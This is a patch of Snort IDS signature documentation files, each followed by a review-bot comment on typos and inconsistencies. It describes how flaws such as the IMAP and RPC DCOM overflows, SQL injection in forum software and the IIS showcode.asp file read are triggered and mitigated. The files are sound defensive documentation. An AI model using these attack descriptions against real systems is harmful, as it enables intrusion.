+Corrective Action:
+Employ egress filtering at the firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/firewall/egress.php
+
+--
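Review bot: the second paragraph of Detailed Information begins mid-sentence, "an indicator of unauthorized network use, reconnaisance activity or system compromise.", so the subject was lost when the text was pasted; restore the opening (for instance, "Traffic to or from the loopback range seen on a non-loopback interface may be ..."). "reconnaisance" is misspelled in both Impact and Detailed Information ("reconnaissance"). Minor: "Sid: 528" puts the value on the header line while the other files put it on the following line, which matters if anything parses these files.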
--- /dev/null
+++ b/doc/signatures/1664.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1664
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+http://www.giac.org/practical/Bjorn_Persson.doc
+
+--
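Review bot: the URL under "Additional References:" (http://www.giac.org/practical/Bjorn_Persson.doc) has no category label, unlike the "Bugtraq:", "CVE:" and "SANS:" labels used in the other files; add an "Other:" label. The Summary and Detailed Information are the generic web-server template and do not say what SID 1664 actually matches; one sentence naming the URI or pattern would make the alert actionable. "arbitrary code of the attackers choosing" needs the possessive "attacker's".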
--- /dev/null
+++ b/doc/signatures/527.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid: 527
+
+--
+Summary:
+This event is generated when traffic on the network is using the same 
+source and destination IP address.
+
+--
+Impact:
+Possible Denial of Service.
+
+--
+Detailed Information:
+Under normal circumstances traffic to and from the same IP address 
+should not be seen on the network. This may be an indicator for the Land
+attack tool.
+
+Some TCP/IP stacks hang or even crash when presented with a TCP SYN 
+packet containing the same source and destination IP address. Some 
+target hosts will crash others will be temporarily disabled.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+A packet that has the same source and destination IP addresses directed to TCP
+port 7007 or 7778 can cause a denial of service for Windows Media Station or
+Windows Media Monitor on Windows 2000 hosts SP2, SP3, SP4 running Windows Media
+services 4.0 or 4.1 will also generate an event from this rule.
+
+--
+Affected Systems:
+	Multiple systems from multiple vendors.
+
+--
+Attack Scenarios:
+The attacker may send traffic from a spoofed source address, in this 
+case the victims IP address.
+
+The attacker may be using the Land attack tool.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Employ egress filtering at the border router or firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/firewall/egress.php
+
+CERT:
+http://www.cert.org/advisories/CA-1997-28.html
+
+Bugtraq:
+http://www.securityfocus.com/bid/9825
+
+--
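Review bot: the same truncated paragraph as in 528.txt appears here, "an indicator of unauthorized network use, reconnaisance activity or system compromise.", starting mid-sentence; restore its opening and fix "reconnaisance". The Windows Media paragraph is grammatically broken: "can cause a denial of service for Windows Media Station or Windows Media Monitor on Windows 2000 hosts SP2, SP3, SP4 running Windows Media services 4.0 or 4.1 will also generate an event from this rule" has two main verbs; split it into "... can cause a denial of service ... on Windows 2000 SP2, SP3 and SP4 hosts running Windows Media Services 4.0 or 4.1. Such a packet will also generate an event from this rule." Also "Some target hosts will crash others will be temporarily disabled" needs a comma or semicolon after "crash", and "the victims IP address" should be "the victim's IP address".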
--- /dev/null
+++ b/doc/signatures/100000154.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000154
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
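Review bot: "Additional References" lacks the trailing colon used by the other files and the "Other:" subsection beneath it is empty; remove the label or add a vendor reference for the MDaemon 8.0.4 fix. Trailing whitespace on "Rule: ", "Sid: ", "-- " and "Summary: " should be stripped so the separator lines match the rest of the patch exactly. The Affected Systems entry "Alt-N MDaemon prior to 8.0.4" is not tab-indented as in the other files.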
--- /dev/null
+++ b/doc/signatures/1037.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1037
+
+--
+Summary:
+This event is generated when an attempt is made to access the showcode.asp file. 
+
+--
+Impact:
+Intelligence gathering.  This attack may permit viewing of files on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Server (IIS) 4.0 has sample files that instruct web developers on the use of Active Server Pages (ASP).  One particular sample file, 'showcode.asp', allows files to be viewed on the vulnerable server.  This is caused by inadequate checking of user input supplied in the "source" parameter, allowing an attacker to navigate outside the directory where the sample files are located.
+
+--
+Affected Systems:
+IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to reference the showcode.asp file, passing it a "source" parameter of the desired file to view. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the showcode.asp file.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0736
+
+Bugtraq
+http://www.securityfocus.com/bid/167
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10007
+
+
+--
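Review bot: the reference labels "CVE", "Bugtraq" and "Nessus" lack the trailing colon used in 2395.txt, 527.txt and 528.txt ("CVE:", "Bugtraq:"); make them consistent. The Detailed Information and Attack Scenarios paragraphs are single unwrapped lines while every other file wraps at roughly 72 columns, "Simple.  " carries trailing spaces, and there is a doubled blank line before the final "--".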
--- /dev/null
+++ b/doc/signatures/3435.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3435
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
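Review bot: this file is a byte-for-byte copy of 3221.txt, including the "Expoit" typo in Ease of Attack and the Attack Scenarios paragraph about "a file with an overly long filename via a network share", which does not describe the RPC DCOM buffer overflow given in Detailed Information. If SIDs 3221 and 3435 cover different RPC DCOM variants or transports, the Summary should say which; otherwise fix the typo and the mismatched scenario here as well and fill in the empty "Additional References:" section.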
--- /dev/null
+++ b/doc/signatures/2134.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the file register.asp directly.
+
+--
+Impact:
+Possible administrator access and arbitrary command execution.
+
+--
+Detailed Information:
+Snitz Forums is an Active Server Page (asp) application running on Microsoft Internet Information Server. A vulnerability exists in Snitz Forums that can allow an attacker to inject SQL code of his choice into the application. The file register.asp contains a flaw that can allow an attacker to gain administrator access to the site. 
+
+The attacker may be trying to gain administrator access to the host, garner information on users of the system, retrieve sensitive information or be attempting to execute arbitrary code.
+
+--
+Affected Systems:
+Any host using IIS with Snitz Forums.
+
+--
+Attack Scenarios:
+An attacker may inject SQL code of his choice. The attacker might then gain administrator access to the host or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a site not running Snitz Forums uses a file named register.asp this rule will generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
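Review bot: the Sid field is empty; "Sid:" is followed by two blank lines and no value, so the documentation cannot be matched to its rule. The file is doc/signatures/2134.txt, so the missing value is presumably 2134, but please confirm against the rule set before filling it in. Also "inject SQL code of his choice" appears twice (Detailed Information and Attack Scenarios); use "of their choice" as the other files do, and wrap the long lines.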
--- /dev/null
+++ b/doc/signatures/100000691.txt
@@ -0,0 +1,80 @@
+
+
+Rule:
+
+--
+Sid:
+100000691
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Diesel Joke Site" application running on a webserver. 
+Access to the file "category.php" with SQL commands being passed as the "id" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "category.php" script used by the 
+"Diesel Joke Site" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running the Diesel Joke Site system.
+
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Currently, no patches or workarounds exist.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+http://www.dieselscripts.com/diesel-joke-site.html
+
+--
+
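Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host ...") is the generic CGI template and is about credential checking, not the SQL injection in the "id" parameter of "category.php" that this rule detects; drop it or trim it to the SQL injection case, and fix the "ona web server" typo. In the Summary, "an exploitation attempt has been attempted" is redundant; "an exploitation attempt has been made" reads better. Corrective Action says "Currently, no patches or workarounds exist", yet the Attack Scenarios section itself identifies the root cause ("if user input is not correctly sanitized or checked before passing that input to the database"); recommend input validation and parameterised queries as interim mitigation rather than leaving the field with no action. The two leading blank lines before "Rule:" should also go.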
--- /dev/null
+++ b/doc/signatures/299.txt
@@ -0,0 +1,60 @@
+SID:
+299
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
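Review bot: this file does not follow the layout of the rest of the patch: "SID:" comes before "Rule:" (elsewhere "Rule:" is first and the header is spelled "Sid:"), the "--" separators precede rather than follow the blank lines, and the final section is named "References:" instead of "Additional References:". If anything indexes these files by header name the capitalised "SID:" and renamed reference section will be missed, so please align the structure. Grammar: in Impact, "as the root user, This can lead to a complete compromise of the targeted system" is a comma splice with a capitalised continuation and no final period; in Detailed Information "IMAPD" should be "imapd" to match the Summary and Attack Scenarios; and the contributor name "matthew harvey" should be capitalised.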
--- /dev/null
+++ b/doc/signatures/2229.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2229
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application phpBB.
+
+--
+Impact:
+Information disclosure possibly leading to serious system compromise.
+
+--
+Detailed Information:
+Some versions of phpBB Group phpBB suffer from a vulnerability that 
+allows an attacker to inject SQL queries of their choosing.
+
+This can result in the disclosure of passwords and other information 
+stored in the database. The data contained in the database may also be 
+corrupted by a malicious SQL query.
+
+--
+Affected Systems:
+	phpBB Group phpBB 2.0.4, 2.0.5
+
+--
+Attack Scenarios:
+The attacker can execute one of the publicly available exploit scripts.
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
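Review bot: the blank line separating sections is missing between Attack Scenarios and the "--" before Ease of Attack ("The attacker can execute one of the publicly available exploit scripts." is immediately followed by "--"), unlike every other section boundary in the patch. "Rule:  " and "-- " carry trailing whitespace. Since Affected Systems names "phpBB 2.0.4, 2.0.5" and Ease of Attack says exploit code exists, the empty "Additional References:" section should at least carry the vendor advisory.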
--- /dev/null
+++ b/doc/signatures/2633.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2633
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "rectifier_diff.differences" and "rectifier_diff.rectify"
+procedures are used to find and resolve inconsistencies between
+two replicated sites. These procedures contain a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "sname1" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
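Review bot: same issues as 2635.txt: "a Oracle database implementation" should be "an Oracle database implementation"; the "$ORACLE_PORTS" sentence is sensor configuration advice and sits oddly under Detailed Information rather than Corrective Action; and "        Oracle 9i" is indented with spaces instead of the tab used elsewhere. Detailed Information names two procedures ("rectifier_diff.differences" and "rectifier_diff.rectify") but Attack Scenarios refers to "the "sname1" variable" without saying which procedure's parameter that is; state it so the two sections line up.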
--- /dev/null
+++ b/doc/signatures/2185.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2185
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in the xlog function of certain Linux NFS Utils packages.
+
+Specifically this event is generated when UDP is used as the attack medium.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol. A vulnerability exists in some versions of the Linux NFS Utilities package prior to 1.0.4 that can lead to the possible execution of arbitrary code or a DoS against the affected server.
+
+A programming error in the xlog function may be exploited by an attacker by sending RPC requests to mountd that do not contain any newline characters. This causes a buffer to overflow thus presenting the attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+Systems using Linux NFS Utils prior to version 1.0.4.
+
+--
+Attack Scenarios:
+An attacker may send a specially crafted RPC request that does not 
+contain any newline characters to the NFS server via TCP or UDP.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
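Review bot: the Summary states "Specifically this event is generated when UDP is used as the attack medium", but Attack Scenarios says the request may be sent "to the NFS server via TCP or UDP"; if SID 2185 is the UDP rule, the scenario should say UDP only (or point to the companion TCP rule), otherwise the Summary is wrong. The Summary and Detailed Information lines are unwrapped while the rest of the file wraps at about 72 columns, and "Additional References:" is empty although a specific package version (nfs-utils prior to 1.0.4) is given.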
--- /dev/null
+++ b/doc/signatures/1084.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1084
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
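Review bot: the body of this file is identical to 1664.txt apart from the missing reference, so nothing here tells a reader what SID 1084 matches as opposed to 1664; add a sentence to the Summary naming the URI or pattern the rule looks for. "arbitrary code of the attackers choosing" needs the possessive "attacker's", and the "Additional References:" section is empty.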
--- /dev/null
+++ b/doc/signatures/1875.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1875
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
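Review bot: typo in Detailed Information, "a CGI application running ona web server" should be "on a web server", and "arbitrary code of the attackers choosing" (twice) needs "attacker's". The line "relationships between the victim server and other hosts can be exploited by the attacker." overruns the wrap width used by the surrounding text. The Summary is the generic CGI template and does not say which CGI program or request SID 1875 matches; one sentence naming it would make the document useful, and "Additional References:" is empty.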
--- /dev/null
+++ b/doc/signatures/1266.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1266
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) mountd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port mountd is using.  Attackers can also learn what versions of the mountd protocol are accepted by mountd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as mountd run.  The mountd RPC service allows remote file system access through Network File System (NFS).  A vulnerability exists in the code that logs NFS mount activity that can cause a buffer overflow, allowing the execution of arbitrary code as root.
+
+--
+Affected Systems:
+Caldera OpenLinux Standard 1.2
+RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where mountd runs.  This may be a precursor to accessing mountd.
+
+--
+Ease of Attack:
+Simple.  Execute 'showmount -e host/IP'.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access mountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for mountd, not probes of the mountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the mountd service itself. An attacker may attempt to go directly to the mountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/121
+
+CERT
+http://www.cert.org/advisories/CA-1998-12.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS13
+
+
+--
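Review bot: The "Affected Systems:" list (Caldera OpenLinux Standard 1.2, RedHat Linux 2.0 through 5.1) describes the mountd logging overflow referenced by CA-1998-12, not the event this rule raises; the rule fires on a portmap GETPORT query regardless of which mountd version the target runs. Either label that list as "systems vulnerable to the referenced mountd overflow" or state that any host running portmapper will produce this event. The "False Negatives:" paragraph is the most useful part of the file and should stay as is.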
--- /dev/null
+++ b/doc/signatures/3347.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3347
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
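Review bot: "Attack Scenarios:" ("a request for a file with an overly long filename via a network share") does not match the "Detailed Information:" above it, which describes a malformed DCOM request sent to an RPC port; this reads as pasted from a different signature and should be rewritten around the RPC request. Also fix "Expoit" in "Ease of Attack:" and fill the empty "Additional References:" with the vendor bulletin for this RPC DCOM issue, since "Corrective Action:" tells the reader to apply its patch.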
--- /dev/null
+++ b/doc/signatures/638.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 638
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+-- 
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS356
+
+Phrack.com:
+http://www.phrack.com/show.php?p=56&a=15
+
+--
